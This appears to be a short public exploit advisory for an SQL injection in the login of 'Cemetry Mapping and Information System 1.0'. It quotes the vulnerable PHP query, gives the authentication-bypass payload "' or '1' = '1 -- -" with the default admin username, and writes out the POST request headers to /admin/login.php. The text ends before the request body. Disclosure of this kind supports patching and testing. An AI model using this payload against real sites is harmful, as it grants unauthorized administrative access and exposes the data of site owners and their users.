# Exploit Title: Cemetry Mapping and Information System 1.0 - 'user_email' Sql Injection (Authentication Bypass)  
# Exploit Author: Marco Catalano  
# Date: 2021-01-25  
# Vendor Homepage:  
# Software Link:  
# Affected Version: 1.0  
# Vulnerable parameter: "user_email" (POST method)  
# Tested on: Linux, PHP/7.4.11  
The userAuthentication function defined in "/include/accounts.php" implements the following code:  
$mydb->setQuery("SELECT * FROM `tbluseraccount` WHERE `U_USERNAME` = '". $U_USERNAME ."' and `U_PASS` = '". $h_pass ."'");  
which is called when trying to log into the administrative panel at "/admin/login.php".  
Proof Of Concept:  
The user input is not properly sanitized and this leads to authentication bypass through the classic "<username>' or '1' = '1 -- -" where <username> has to be a valid username. For example, the default username is "janobe".  
POST /admin/login.php?logout=1 HTTP/1.1  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 69  
Connection: close  
Cookie: wp-settings-time-1=1611158502; PHPSESSID=ujhslpm8cg18eeb1jd7nempudj  
Upgrade-Insecure-Requests: 1